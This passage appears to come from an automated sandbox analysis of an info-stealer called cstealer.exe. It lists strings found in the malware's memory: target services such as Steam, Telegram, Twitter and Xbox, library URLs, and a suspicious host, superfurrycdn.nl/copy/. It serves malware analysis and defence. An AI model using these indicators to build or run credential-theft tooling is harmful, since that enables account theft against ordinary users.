                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://spotify.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spotify.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://stake.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://stake.com))
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steam.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.com)z
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://superfurrycdn.nl/copy/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://telegram.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://telegram.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://tiktok.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiktok.com)z
                                Source: cstealer.exe, 00000003.00000002.2628303853.00000271D9E83000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2495003008.00000271D9E7F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553076024.00000271D9E82000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2550902287.00000271D9E80000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2484503329.00000271D9E7D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443036423.00000271D9E7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275592639.0000020102C31000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2297938148.0000020102C33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://twitch.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitch.com)z
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com)z
                                Source: cstealer.exe, 00000003.00000003.2527962136.00000271DA17F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2665159466.00000271DA184000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2519598138.00000271DA17E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2490199129.00000271D9FDB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496547521.00000271D9FF4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501756441.00000271DA17D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179117059.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2435547245.00000271D9FDA000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2183488711.00000271DA183000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2273985775.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2276170958.0000020102A66000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103155000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2222114671.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2279541412.0000020102A73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217808109.0000020103199000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2281510656.000002010319A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215152893.0000020103182000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 
00000009.00000003.2273515277.0000020103198000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219393819.0000020103199000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://uber.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uber.com)z
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyP
                                Source: cstealer.exe, 00000003.00000002.2700205546.00000271DA8A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2386235093.0000020103570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
                                Source: cstealer.exe, 00000003.00000003.2176664163.00000271DA486000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN
                                Source: cstealer.exe, 00000002.00000003.2164160574.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191097529.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                                Source: cstealer.exe, 00000002.00000003.2164299642.0000024728B94000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000007.00000003.2191232291.0000014E6F9D4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2488888801.00007FF8A8376000.00000002.00000001.01000000.0000002B.sdmp, cstealer.exe, 00000009.00000002.2538789657.00007FF8B80DB000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://www.openssl.org/H
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2647937867.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2544001972.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553966495.00000271DA031000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215216888.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212971646.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2214455444.0000020102AC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2274584655.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278980759.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221596067.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2217913546.0000020102AB5000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280237050.0000020102AC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
                                Source: cstealer.exe, 00000003.00000002.2685159509.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552853520.00000271D9E61000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2454347629.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2496638039.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2526154847.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2465182617.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2534726372.00000271D9E5F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2475893944.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2626607283.00000271D9E63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2437236490.00000271DA4C1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2278585948.0000020102D69000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2288716798.0000020102D73000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C45000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219297848.0000020103202000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                                Source: cstealer.exe, 00000003.00000003.2170388540.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2607686027.00000271D9960000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170218167.00000271D9E14000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170115313.00000271D9E13000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170290196.00000271D9DE7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2195916443.00000170DBC4E000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220157695.00000170DB7C4000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197454135.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197231319.0000020102A3F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2312005258.00000201025C0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197406606.0000020102A6B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2197166727.0000020102A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                                Source: main.exe, main.exe, 00000008.00000002.2222098181.00007FF8A8D68000.00000040.00000001.01000000.0000001A.sdmp, cstealer.exe, 00000009.00000002.2503405873.00007FF8A8798000.00000004.00000001.01000000.0000001C.sdmpString found in binary or memory: https://www.python.org/psf/license/
                                Source: cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)
                                Source: cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xbox.com)z
